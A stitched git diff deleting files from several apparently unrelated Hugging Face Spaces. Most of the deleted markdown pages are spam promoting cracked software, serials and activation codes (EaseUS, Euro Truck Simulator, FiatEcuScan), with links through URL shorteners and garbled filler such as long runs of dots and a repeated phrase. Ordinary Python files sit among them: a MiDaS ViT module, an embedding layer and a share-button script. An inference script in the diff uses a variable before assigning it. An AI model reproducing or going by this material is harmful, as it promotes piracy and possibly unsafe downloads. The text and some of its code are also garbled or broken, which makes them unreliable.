          easeus data recovery crack lets you to recover lost files and folders from formatted hard drives, formatted solid state drives, and even from damaged windows operating system. this software also helps you to recover partition table from different storage devices like external hard disks, external solid state drives, usb, and even from windows operating system.

          -

          easeus data recovery crack lets you to recover data from damaged disks, damaged partitions, corrupted windows operating system, and even corrupted microsoft office file. this software allows you to recover any type of data from any storage device. this software also helps you to recover data even if you have accidentally deleted it. this software lets you recover data from damaged hard drives, corrupted hard drives, damaged solid state drives, corrupted partitions, and even from corrupted windows operating system.

          -

          easeus data recovery crack is a powerful data recovery tool that can recover files and folders from damaged hard drives, damaged partitions, corrupted windows operating system, and even corrupted microsoft office file. this software also allows you to recover data from any storage device. this software is a complete data recovery software that supports multiple operating systems.

          -

          899543212b
          -
          -
          \ No newline at end of file diff --git a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Korg Pa800 Set Armenianbfdcm ((BETTER)).md b/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Korg Pa800 Set Armenianbfdcm ((BETTER)).md deleted file mode 100644 index c06ce0518a4ea9db8d20b007e64b9f2b4c07b35c..0000000000000000000000000000000000000000 --- a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Korg Pa800 Set Armenianbfdcm ((BETTER)).md +++ /dev/null @@ -1,6 +0,0 @@ -

          Korg pa800 set armenianbfdcm


          DOWNLOADhttps://cinurl.com/2uEYyY



          -
          -Korg pa800 set armenianbfdcm · Omega A Journey Through Timel · Generals Zero Hour Maps 8 Players 11l · Monitorizacion Hemodinamica ... 1fdad05405
          -
          -
          -

          diff --git a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Spire.PDF.for..NET.2.3.0.with.Serial.md b/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Spire.PDF.for..NET.2.3.0.with.Serial.md deleted file mode 100644 index 218cf1b0afd4779bc0128a072ca3dd5679ed8cb6..0000000000000000000000000000000000000000 --- a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Spire.PDF.for..NET.2.3.0.with.Serial.md +++ /dev/null @@ -1,6 +0,0 @@ -

          Spire.PDF.for..NET.2.3.0.with.Serial


          DOWNLOAD ––– https://cinurl.com/2uEXcT



          -
          -PDF | Loss of bone stock is a major problem in revision surgery of the hip. Impaction ... The serial post-operative radiographs were assessed for. 4d29de3e1b
          -
          -
          -

          diff --git a/spaces/surmensipa/VITS-Umamusume-voice-synthesizer/logs/Activation Code For Euro Truck Simulator 1.3 [CRACKED].md b/spaces/surmensipa/VITS-Umamusume-voice-synthesizer/logs/Activation Code For Euro Truck Simulator 1.3 [CRACKED].md deleted file mode 100644 index c3da8480294befeeecde87563ac4ac55a62d6d2b..0000000000000000000000000000000000000000 --- a/spaces/surmensipa/VITS-Umamusume-voice-synthesizer/logs/Activation Code For Euro Truck Simulator 1.3 [CRACKED].md +++ /dev/null @@ -1,6 +0,0 @@ -

          Activation Code For Euro Truck Simulator 1.3


          Download Ziphttps://urluss.com/2uCHpo



          - - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4fefd39f24
          -
          -
          -

          diff --git a/spaces/surmensipa/VITS-Umamusume-voice-synthesizer/logs/Arul Nool Tamil Pdf 233 BETTER.md b/spaces/surmensipa/VITS-Umamusume-voice-synthesizer/logs/Arul Nool Tamil Pdf 233 BETTER.md deleted file mode 100644 index ff2dfb0216903feadd5d396d481833a9ea0c3e40..0000000000000000000000000000000000000000 --- a/spaces/surmensipa/VITS-Umamusume-voice-synthesizer/logs/Arul Nool Tamil Pdf 233 BETTER.md +++ /dev/null @@ -1,6 +0,0 @@ -

          Arul Nool Tamil Pdf 233


          Download Filehttps://urluss.com/2uCE0c



          -
          -Krishna Yuddham. English. 132 pages (11.8 MB). English. Download PDF. txt file. Click on the above image to download Tamil Pada Nool in PDF format. Tamil Nattu Pada Nool pdf. DOWNLOAD (Mirror #1). >>> DOWNLOAD (Mirror #1). Tamil Pada Nool. Damayanthi. Bagyanathan. Kanidham Karpithal. Tamil Nattu Pada Nool Tamil Pada Nool. English. Tamil Pada Nool. Tamil Pada Nool Tamil Pada Nool. Tamil Nattu Pada Nool. Tamil Pada Nool. Damayanthi. Bagyanathan. Kanidham Karpithal. Tamil Pada Nool. English. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Nattu Pada Nool. Tamil Nattu Pada Nool. Tamil Pada Nool. Damayanthi. Bagyanathan. Kanidham Karpithal. Tamil Pada Nool. English. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Nattu Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Nattu Pada Nool. Tamil Pada Nool. Tamil Nattu Pada Nool. Tamil Nattu Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Nattu Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Nattu Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada Nool. Tamil Pada N 4fefd39f24
          -
          -
          -

          diff --git a/spaces/svjack/ControlNet-Pose-Chinese/annotator/midas/midas/vit.py b/spaces/svjack/ControlNet-Pose-Chinese/annotator/midas/midas/vit.py deleted file mode 100644 index ea46b1be88b261b0dec04f3da0256f5f66f88a74..0000000000000000000000000000000000000000 --- a/spaces/svjack/ControlNet-Pose-Chinese/annotator/midas/midas/vit.py +++ /dev/null @@ -1,491 +0,0 @@ -import torch -import torch.nn as nn -import timm -import types -import math -import torch.nn.functional as F - - -class Slice(nn.Module): - def __init__(self, start_index=1): - super(Slice, self).__init__() - self.start_index = start_index - - def forward(self, x): - return x[:, self.start_index :] - - -class AddReadout(nn.Module): - def __init__(self, start_index=1): - super(AddReadout, self).__init__() - self.start_index = start_index - - def forward(self, x): - if self.start_index == 2: - readout = (x[:, 0] + x[:, 1]) / 2 - else: - readout = x[:, 0] - return x[:, self.start_index :] + readout.unsqueeze(1) - - -class ProjectReadout(nn.Module): - def __init__(self, in_features, start_index=1): - super(ProjectReadout, self).__init__() - self.start_index = start_index - - self.project = nn.Sequential(nn.Linear(2 * in_features, in_features), nn.GELU()) - - def forward(self, x): - readout = x[:, 0].unsqueeze(1).expand_as(x[:, self.start_index :]) - features = torch.cat((x[:, self.start_index :], readout), -1) - - return self.project(features) - - -class Transpose(nn.Module): - def __init__(self, dim0, dim1): - super(Transpose, self).__init__() - self.dim0 = dim0 - self.dim1 = dim1 - - def forward(self, x): - x = x.transpose(self.dim0, self.dim1) - return x - - -def forward_vit(pretrained, x): - b, c, h, w = x.shape - - glob = pretrained.model.forward_flex(x) - - layer_1 = pretrained.activations["1"] - layer_2 = pretrained.activations["2"] - layer_3 = pretrained.activations["3"] - layer_4 = pretrained.activations["4"] - - layer_1 = pretrained.act_postprocess1[0:2](layer_1) - layer_2 = pretrained.act_postprocess2[0:2](layer_2) - layer_3 = pretrained.act_postprocess3[0:2](layer_3) - layer_4 = pretrained.act_postprocess4[0:2](layer_4) - - unflatten = nn.Sequential( - nn.Unflatten( - 2, - torch.Size( - [ - h // pretrained.model.patch_size[1], - w // pretrained.model.patch_size[0], - ] - ), - ) - ) - - if layer_1.ndim == 3: - layer_1 = unflatten(layer_1) - if layer_2.ndim == 3: - layer_2 = unflatten(layer_2) - if layer_3.ndim == 3: - layer_3 = unflatten(layer_3) - if layer_4.ndim == 3: - layer_4 = unflatten(layer_4) - - layer_1 = pretrained.act_postprocess1[3 : len(pretrained.act_postprocess1)](layer_1) - layer_2 = pretrained.act_postprocess2[3 : len(pretrained.act_postprocess2)](layer_2) - layer_3 = pretrained.act_postprocess3[3 : len(pretrained.act_postprocess3)](layer_3) - layer_4 = pretrained.act_postprocess4[3 : len(pretrained.act_postprocess4)](layer_4) - - return layer_1, layer_2, layer_3, layer_4 - - -def _resize_pos_embed(self, posemb, gs_h, gs_w): - posemb_tok, posemb_grid = ( - posemb[:, : self.start_index], - posemb[0, self.start_index :], - ) - - gs_old = int(math.sqrt(len(posemb_grid))) - - posemb_grid = posemb_grid.reshape(1, gs_old, gs_old, -1).permute(0, 3, 1, 2) - posemb_grid = F.interpolate(posemb_grid, size=(gs_h, gs_w), mode="bilinear") - posemb_grid = posemb_grid.permute(0, 2, 3, 1).reshape(1, gs_h * gs_w, -1) - - posemb = torch.cat([posemb_tok, posemb_grid], dim=1) - - return posemb - - -def forward_flex(self, x): - b, c, h, w = x.shape - - pos_embed = self._resize_pos_embed( - self.pos_embed, h // self.patch_size[1], w // self.patch_size[0] - ) - - B = x.shape[0] - - if hasattr(self.patch_embed, "backbone"): - x = self.patch_embed.backbone(x) - if isinstance(x, (list, tuple)): - x = x[-1] # last feature if backbone outputs list/tuple of features - - x = self.patch_embed.proj(x).flatten(2).transpose(1, 2) - - if getattr(self, "dist_token", None) is not None: - cls_tokens = self.cls_token.expand( - B, -1, -1 - ) # stole cls_tokens impl from Phil Wang, thanks - dist_token = self.dist_token.expand(B, -1, -1) - x = torch.cat((cls_tokens, dist_token, x), dim=1) - else: - cls_tokens = self.cls_token.expand( - B, -1, -1 - ) # stole cls_tokens impl from Phil Wang, thanks - x = torch.cat((cls_tokens, x), dim=1) - - x = x + pos_embed - x = self.pos_drop(x) - - for blk in self.blocks: - x = blk(x) - - x = self.norm(x) - - return x - - -activations = {} - - -def get_activation(name): - def hook(model, input, output): - activations[name] = output - - return hook - - -def get_readout_oper(vit_features, features, use_readout, start_index=1): - if use_readout == "ignore": - readout_oper = [Slice(start_index)] * len(features) - elif use_readout == "add": - readout_oper = [AddReadout(start_index)] * len(features) - elif use_readout == "project": - readout_oper = [ - ProjectReadout(vit_features, start_index) for out_feat in features - ] - else: - assert ( - False - ), "wrong operation for readout token, use_readout can be 'ignore', 'add', or 'project'" - - return readout_oper - - -def _make_vit_b16_backbone( - model, - features=[96, 192, 384, 768], - size=[384, 384], - hooks=[2, 5, 8, 11], - vit_features=768, - use_readout="ignore", - start_index=1, -): - pretrained = nn.Module() - - pretrained.model = model - pretrained.model.blocks[hooks[0]].register_forward_hook(get_activation("1")) - pretrained.model.blocks[hooks[1]].register_forward_hook(get_activation("2")) - pretrained.model.blocks[hooks[2]].register_forward_hook(get_activation("3")) - pretrained.model.blocks[hooks[3]].register_forward_hook(get_activation("4")) - - pretrained.activations = activations - - readout_oper = get_readout_oper(vit_features, features, use_readout, start_index) - - # 32, 48, 136, 384 - pretrained.act_postprocess1 = nn.Sequential( - readout_oper[0], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[0], - kernel_size=1, - stride=1, - padding=0, - ), - nn.ConvTranspose2d( - in_channels=features[0], - out_channels=features[0], - kernel_size=4, - stride=4, - padding=0, - bias=True, - dilation=1, - groups=1, - ), - ) - - pretrained.act_postprocess2 = nn.Sequential( - readout_oper[1], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[1], - kernel_size=1, - stride=1, - padding=0, - ), - nn.ConvTranspose2d( - in_channels=features[1], - out_channels=features[1], - kernel_size=2, - stride=2, - padding=0, - bias=True, - dilation=1, - groups=1, - ), - ) - - pretrained.act_postprocess3 = nn.Sequential( - readout_oper[2], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[2], - kernel_size=1, - stride=1, - padding=0, - ), - ) - - pretrained.act_postprocess4 = nn.Sequential( - readout_oper[3], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[3], - kernel_size=1, - stride=1, - padding=0, - ), - nn.Conv2d( - in_channels=features[3], - out_channels=features[3], - kernel_size=3, - stride=2, - padding=1, - ), - ) - - pretrained.model.start_index = start_index - pretrained.model.patch_size = [16, 16] - - # We inject this function into the VisionTransformer instances so that - # we can use it with interpolated position embeddings without modifying the library source. - pretrained.model.forward_flex = types.MethodType(forward_flex, pretrained.model) - pretrained.model._resize_pos_embed = types.MethodType( - _resize_pos_embed, pretrained.model - ) - - return pretrained - - -def _make_pretrained_vitl16_384(pretrained, use_readout="ignore", hooks=None): - model = timm.create_model("vit_large_patch16_384", pretrained=pretrained) - - hooks = [5, 11, 17, 23] if hooks == None else hooks - return _make_vit_b16_backbone( - model, - features=[256, 512, 1024, 1024], - hooks=hooks, - vit_features=1024, - use_readout=use_readout, - ) - - -def _make_pretrained_vitb16_384(pretrained, use_readout="ignore", hooks=None): - model = timm.create_model("vit_base_patch16_384", pretrained=pretrained) - - hooks = [2, 5, 8, 11] if hooks == None else hooks - return _make_vit_b16_backbone( - model, features=[96, 192, 384, 768], hooks=hooks, use_readout=use_readout - ) - - -def _make_pretrained_deitb16_384(pretrained, use_readout="ignore", hooks=None): - model = timm.create_model("vit_deit_base_patch16_384", pretrained=pretrained) - - hooks = [2, 5, 8, 11] if hooks == None else hooks - return _make_vit_b16_backbone( - model, features=[96, 192, 384, 768], hooks=hooks, use_readout=use_readout - ) - - -def _make_pretrained_deitb16_distil_384(pretrained, use_readout="ignore", hooks=None): - model = timm.create_model( - "vit_deit_base_distilled_patch16_384", pretrained=pretrained - ) - - hooks = [2, 5, 8, 11] if hooks == None else hooks - return _make_vit_b16_backbone( - model, - features=[96, 192, 384, 768], - hooks=hooks, - use_readout=use_readout, - start_index=2, - ) - - -def _make_vit_b_rn50_backbone( - model, - features=[256, 512, 768, 768], - size=[384, 384], - hooks=[0, 1, 8, 11], - vit_features=768, - use_vit_only=False, - use_readout="ignore", - start_index=1, -): - pretrained = nn.Module() - - pretrained.model = model - - if use_vit_only == True: - pretrained.model.blocks[hooks[0]].register_forward_hook(get_activation("1")) - pretrained.model.blocks[hooks[1]].register_forward_hook(get_activation("2")) - else: - pretrained.model.patch_embed.backbone.stages[0].register_forward_hook( - get_activation("1") - ) - pretrained.model.patch_embed.backbone.stages[1].register_forward_hook( - get_activation("2") - ) - - pretrained.model.blocks[hooks[2]].register_forward_hook(get_activation("3")) - pretrained.model.blocks[hooks[3]].register_forward_hook(get_activation("4")) - - pretrained.activations = activations - - readout_oper = get_readout_oper(vit_features, features, use_readout, start_index) - - if use_vit_only == True: - pretrained.act_postprocess1 = nn.Sequential( - readout_oper[0], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[0], - kernel_size=1, - stride=1, - padding=0, - ), - nn.ConvTranspose2d( - in_channels=features[0], - out_channels=features[0], - kernel_size=4, - stride=4, - padding=0, - bias=True, - dilation=1, - groups=1, - ), - ) - - pretrained.act_postprocess2 = nn.Sequential( - readout_oper[1], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[1], - kernel_size=1, - stride=1, - padding=0, - ), - nn.ConvTranspose2d( - in_channels=features[1], - out_channels=features[1], - kernel_size=2, - stride=2, - padding=0, - bias=True, - dilation=1, - groups=1, - ), - ) - else: - pretrained.act_postprocess1 = nn.Sequential( - nn.Identity(), nn.Identity(), nn.Identity() - ) - pretrained.act_postprocess2 = nn.Sequential( - nn.Identity(), nn.Identity(), nn.Identity() - ) - - pretrained.act_postprocess3 = nn.Sequential( - readout_oper[2], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[2], - kernel_size=1, - stride=1, - padding=0, - ), - ) - - pretrained.act_postprocess4 = nn.Sequential( - readout_oper[3], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[3], - kernel_size=1, - stride=1, - padding=0, - ), - nn.Conv2d( - in_channels=features[3], - out_channels=features[3], - kernel_size=3, - stride=2, - padding=1, - ), - ) - - pretrained.model.start_index = start_index - pretrained.model.patch_size = [16, 16] - - # We inject this function into the VisionTransformer instances so that - # we can use it with interpolated position embeddings without modifying the library source. - pretrained.model.forward_flex = types.MethodType(forward_flex, pretrained.model) - - # We inject this function into the VisionTransformer instances so that - # we can use it with interpolated position embeddings without modifying the library source. - pretrained.model._resize_pos_embed = types.MethodType( - _resize_pos_embed, pretrained.model - ) - - return pretrained - - -def _make_pretrained_vitb_rn50_384( - pretrained, use_readout="ignore", hooks=None, use_vit_only=False -): - model = timm.create_model("vit_base_resnet50_384", pretrained=pretrained) - - hooks = [0, 1, 8, 11] if hooks == None else hooks - return _make_vit_b_rn50_backbone( - model, - features=[256, 512, 768, 768], - size=[384, 384], - hooks=hooks, - use_vit_only=use_vit_only, - use_readout=use_readout, - ) diff --git a/spaces/szukevin/VISOR-GPT/train/tencentpretrain/embeddings/embedding.py b/spaces/szukevin/VISOR-GPT/train/tencentpretrain/embeddings/embedding.py deleted file mode 100644 index 15fab2ea58fb9d07024b70097f27f83d0decd740..0000000000000000000000000000000000000000 --- a/spaces/szukevin/VISOR-GPT/train/tencentpretrain/embeddings/embedding.py +++ /dev/null @@ -1,34 +0,0 @@ -import torch.nn as nn -import torch -from tencentpretrain.layers.layer_norm import LayerNorm - - -class Embedding(nn.Module): - def __init__(self, args): - super(Embedding, self).__init__() - self.embedding_name_list = [] - self.dropout = nn.Dropout(args.dropout) - self.remove_embedding_layernorm = args.remove_embedding_layernorm - if not self.remove_embedding_layernorm and "dual" not in args.embedding: - self.layer_norm = LayerNorm(args.emb_size) - - def update(self, embedding, embedding_name): - setattr(self, embedding_name, embedding) - self.embedding_name_list.append(embedding_name) - - def forward(self, src, seg): - if self.embedding_name_list[0] == "dual": - return self.dual(src, seg) - - for i, embedding_name in enumerate(self.embedding_name_list): - embedding = getattr(self, embedding_name) - - if i == 0: - emb = embedding(src, seg) - else: - emb += embedding(src, seg) - - if not self.remove_embedding_layernorm: - emb = self.layer_norm(emb) - emb = self.dropout(emb) - return emb diff --git a/spaces/teganmosi/codellama-playground/share_btn.py b/spaces/teganmosi/codellama-playground/share_btn.py deleted file mode 100644 index 2587a360a189c4cc488d23b48c3cf1ca7151b04c..0000000000000000000000000000000000000000 --- a/spaces/teganmosi/codellama-playground/share_btn.py +++ /dev/null @@ -1,112 +0,0 @@ -community_icon_html = """""" - -loading_icon_html = """""" - -share_js = """async () => { - async function uploadFile(file){ - const UPLOAD_URL = 'https://huggingface.co/uploads'; - const response = await fetch(UPLOAD_URL, { - method: 'POST', - headers: { - 'Content-Type': file.type, - 'X-Requested-With': 'XMLHttpRequest', - }, - body: file, /// <- File inherits from Blob - }); - const url = await response.text(); - return url; - } - - async function getInputImgFile(imgEl){ - const res = await fetch(imgEl.src); - const blob = await res.blob(); - const imgId = Date.now() % 200; - const isPng = imgEl.src.startsWith(`data:image/png`); - if(isPng){ - const fileName = `sd-perception-${{imgId}}.png`; - return new File([blob], fileName, { type: 'image/png' }); - }else{ - const fileName = `sd-perception-${{imgId}}.jpg`; - return new File([blob], fileName, { type: 'image/jpeg' }); - } - } - - // const gradioEl = document.querySelector('body > gradio-app'); - const gradioEl = document.querySelector("gradio-app"); - const inputTxt = gradioEl.querySelector('#q-input textarea').value; - let outputTxt = gradioEl.querySelector('#q-output .codemirror-wrapper .cm-scroller > div:nth-of-type(2)').innerText; - outputTxt = `
          ${outputTxt}
          ` - - const titleLength = 150; - let titleTxt = inputTxt; - if(titleTxt.length > titleLength){ - titleTxt = titleTxt.slice(0, titleLength) + ' ...'; - } - - const shareBtnEl = gradioEl.querySelector('#share-btn'); - const shareIconEl = gradioEl.querySelector('#share-btn-share-icon'); - const loadingIconEl = gradioEl.querySelector('#share-btn-loading-icon'); - - if(!inputTxt || !outputTxt){ - return; - }; - - shareBtnEl.style.pointerEvents = 'none'; - shareIconEl.style.display = 'none'; - loadingIconEl.style.removeProperty('display'); - - const descriptionMd = `### Question: -${inputTxt} - -### Answer: - -${outputTxt}`; - - const params = { - title: titleTxt, - description: descriptionMd, - }; - - const paramsStr = Object.entries(params) - .map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`) - .join('&'); - - window.open(`https://huggingface.co/spaces/bigcode/bigcode-playground/discussions/new?${paramsStr}`, '_blank'); - - shareBtnEl.style.removeProperty('pointer-events'); - shareIconEl.style.removeProperty('display'); - loadingIconEl.style.display = 'none'; -}""" - -share_btn_css = """ -a {text-decoration-line: underline; font-weight: 600;} -.animate-spin { - animation: spin 1s linear infinite; -} -@keyframes spin { - from { transform: rotate(0deg); } - to { transform: rotate(360deg); } -} -#share-btn-container { - display: flex; padding-left: 0.5rem !important; padding-right: 0.5rem !important; background-color: #000000; justify-content: center; align-items: center; border-radius: 9999px !important; width: 13rem; -} -#share-btn { - all: initial; color: #ffffff;font-weight: 600; cursor:pointer; font-family: 'IBM Plex Sans', sans-serif; margin-left: 0.5rem !important; padding-top: 0.25rem !important; padding-bottom: 0.25rem !important; -} -#share-btn * { - all: unset; -} -#share-btn-container div:nth-child(-n+2){ - width: auto !important; - min-height: 0px !important; -} -#share-btn-container .wrap { - display: none !important; -} -""" \ No newline at end of file diff --git a/spaces/terfces0erbo/CollegeProjectV2/FiatEcuScan 2.6.2 Cracked.rar.md b/spaces/terfces0erbo/CollegeProjectV2/FiatEcuScan 2.6.2 Cracked.rar.md deleted file mode 100644 index b8d9063f92458522f6fd39ea92c70b563ecf601b..0000000000000000000000000000000000000000 --- a/spaces/terfces0erbo/CollegeProjectV2/FiatEcuScan 2.6.2 Cracked.rar.md +++ /dev/null @@ -1,8 +0,0 @@ -

          FiatEcuScan 2.6.2 Cracked.rar


          DOWNLOAD >>> https://bytlly.com/2uGl8S



          -
          -. /stories/2205614-free-download-fsx-steam-edition-hd-airport-graphics-add-on-rar-new / -Stalker call of pripyat sgm mod - stalker call of pripyat sgm mod - stalker: call of pripyat - stalker: call of pripyat - stalker: call of pripyat - stalker: call of pripyat - stalker: call of pripyat - stalker: call of pripyat - stalker: call of pripyat - stalker: call of pripyat - stalker: call of pripyat - stalker: call of pripyat - stalker: call of pripyat - stalker: call of pripyat - stalker: call of pripyat - stalker: -call of pripyat - stalker: call of prip 8a78ff9644
          -
          -
          -

          diff --git a/spaces/thuanz123/peft-sd-realfill/inference.py b/spaces/thuanz123/peft-sd-realfill/inference.py deleted file mode 100644 index 9bed6b7d12c1a85e855e058f5b9a1d3410faa776..0000000000000000000000000000000000000000 --- a/spaces/thuanz123/peft-sd-realfill/inference.py +++ /dev/null @@ -1,63 +0,0 @@ -from __future__ import annotations - -import gc -import json -import pathlib -import sys - -import gradio as gr -import PIL.Image -import torch -from diffusers import StableDiffusionInpaintPipeline - - -class InferencePipeline: - def __init__(self): - self.pipe = None - self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") - - def clear(self) -> None: - del self.pipe - self.pipe = None - torch.cuda.empty_cache() - gc.collect() - - def load_pipe(self, realfill_model: str) -> None: - pipe = StableDiffusionInpaintPipeline.from_pretrained( - realfill_model, torch_dtype=torch.float16 - ).to(self.device) - pipe = pipe.to(self.device) - self.pipe = pipe - - def run( - self, - realfill_model: str, - target_image: PIL.Image, - target_mask: PIL.Image, - seed: int, - n_steps: int, - guidance_scale: float, - ) -> PIL.Image.Image: - if not torch.cuda.is_available(): - raise gr.Error("CUDA is not available.") - - self.load_pipe(realfill_model) - - image = PIL.Image.open(target_image) - mask_image = PIL.Image.open(target_mask) - - generator = torch.Generator(device=self.device).manual_seed(seed) - out = self.pipe( - "a photo of sks", - image=image, - mask_image=mask_image, - num_inference_steps=n_steps, - guidance_scale=guidance_scale, - generator=generator, - ).images[0] # type: ignore - - erode_kernel = PIL.ImageFilter.MaxFilter(3) - mask_image = mask_image.filter(erode_kernel) - - result = PIL.Image.composite(result, out, mask_image) - return result diff --git a/spaces/tialenAdioni/chat-gpt-api/logs/Autodesk Inventor CAM Ultimate 2020 Torrent UPD.md b/spaces/tialenAdioni/chat-gpt-api/logs/Autodesk Inventor CAM Ultimate 2020 Torrent UPD.md deleted file mode 100644 index 3a30cc1c91c8e97a184cf9d98d4d4684d2c359d1..0000000000000000000000000000000000000000 --- a/spaces/tialenAdioni/chat-gpt-api/logs/Autodesk Inventor CAM Ultimate 2020 Torrent UPD.md +++ /dev/null @@ -1,29 +0,0 @@ -
          -

          How to Download Autodesk Inventor CAM Ultimate 2020 for Free

          -

          Autodesk Inventor CAM Ultimate 2020 is a powerful software that simplifies the machining workflow with CAD-embedded 2.5-axis to 5-axis milling, turning, and mill-turn capabilities[^2^]. It also offers advanced roughing strategy for efficiently removing a high volume of material while minimizing tool and machine wear.

          -

          Autodesk Inventor CAM Ultimate 2020 Torrent


          Download Zip ->>->>->> https://urlcod.com/2uK7Qv



          -

          If you want to download Autodesk Inventor CAM Ultimate 2020 for free, you might be tempted to use a torrent site. However, this is not recommended for several reasons. First, torrent sites are often unsafe and may contain malware or viruses that can harm your computer. Second, torrent sites are illegal and may expose you to legal risks or penalties. Third, torrent sites may not have the latest version or the complete features of the software.

          -

          The best way to download Autodesk Inventor CAM Ultimate 2020 for free is to use the official website of Autodesk. Autodesk offers a free trial of the software for 30 days, which allows you to test its functionality and performance before buying it. You can also access online tutorials, videos, and support from Autodesk experts during the trial period.

          -

          To download Autodesk Inventor CAM Ultimate 2020 for free from Autodesk, follow these steps:

          -
            -
          1. Go to https://www.autodesk.com/products/inventor-cam/overview and click on "Download free trial".
          2. -
          3. Sign in with your Autodesk account or create one if you don't have one.
          4. -
          5. Select your operating system, language, and version (64-bit).
          6. -
          7. Click on "Install now" and follow the instructions to install the software on your computer.
          8. -
          9. Launch the software and activate it with your Autodesk account.
          10. -
          -

          You can now enjoy Autodesk Inventor CAM Ultimate 2020 for free for 30 days. If you decide to buy the software after the trial period, you can do so from the same website.

          - -

          Autodesk Inventor CAM Ultimate 2020 is a comprehensive solution for CNC machining. It integrates seamlessly with Autodesk Inventor, a 3D CAD software that allows you to design and model complex parts and assemblies. You can use the same interface and data to create toolpaths, simulate operations, and generate G-code for your CNC machines.

          -

          -

          With Autodesk Inventor CAM Ultimate 2020, you can take advantage of various features and benefits, such as:

          -
            -
          • Adaptive clearing: a high-efficiency roughing strategy that reduces cycle time and tool wear by maintaining a constant tool load.
          • -
          • 3D contouring: a finishing strategy that creates smooth and accurate surfaces with minimal retractions and sharp corners.
          • -
          • 5-axis simultaneous machining: a multi-axis strategy that enables you to machine complex shapes and features with a single setup.
          • -
          • Turning and mill-turn: a complete solution for turning and mill-turn operations that supports live tooling, sub-spindles, and multiple turrets.
          • -
          • Post processor library: a collection of ready-to-use post processors for various CNC machines and controllers.
          • -
          -

          Autodesk Inventor CAM Ultimate 2020 is compatible with Windows 10 (64-bit) and requires Autodesk Inventor 2020 or later. It also requires a minimum of 8 GB of RAM, 40 GB of disk space, and a graphics card with 1 GB of VRAM.

          e93f5a0c3f
          -
          -
          \ No newline at end of file diff --git a/spaces/tialenAdioni/chat-gpt-api/logs/Dont Lose Your QuickBooks 2018 License and Product Number Heres How to Keep Them Safe.md b/spaces/tialenAdioni/chat-gpt-api/logs/Dont Lose Your QuickBooks 2018 License and Product Number Heres How to Keep Them Safe.md deleted file mode 100644 index ad0a09f8743bb6dfa77868f93878ad8ce64f54ac..0000000000000000000000000000000000000000 --- a/spaces/tialenAdioni/chat-gpt-api/logs/Dont Lose Your QuickBooks 2018 License and Product Number Heres How to Keep Them Safe.md +++ /dev/null @@ -1,27 +0,0 @@ -
          -

          How to Find Your QuickBooks 2018 License and Product Number

          -

          If you have purchased QuickBooks 2018, you will need to enter your license and product number to activate and use the software. These numbers are unique to your purchase and prove that you own a legitimate copy of QuickBooks. But what if you lose or forget these numbers? Don't worry, there are ways to find them again.

          -

          In this article, we will show you how to find your QuickBooks 2018 license and product number in different scenarios. Whether you have downloaded the software from the internet, installed it from a CD, or bought it from a retailer, we have you covered.

          -

          quickbooks 2018 license and product number crack


          DOWNLOAD ✏ ✏ ✏ https://urlcod.com/2uK3xc



          -

          Find Your License and Product Number Online

          -

          If you have downloaded QuickBooks 2018 from the internet, you can find your license and product number in the confirmation email that was sent to you after your purchase. You can also log in to your Intuit account and go to the Manage your QuickBooks page. There you will see a list of your products and services, along with their license and product numbers.

          -

          Find Your License and Product Number on a CD

          -

          If you have installed QuickBooks 2018 from a CD, you can find your license and product number on the packaging of the CD. Look for a brightly colored sticker that has a barcode and a 15-digit number. The first 5 digits are your product number and the next 10 digits are your license number.

          -

          Find Your License and Product Number on a Retail Box

          -

          If you have bought QuickBooks 2018 from a retailer, you can find your license and product number on the box that contains the CD. Look for a label that has a barcode and a 15-digit number. The first 5 digits are your product number and the next 10 digits are your license number.

          -

          What If You Can't Find Your License and Product Number?

          -

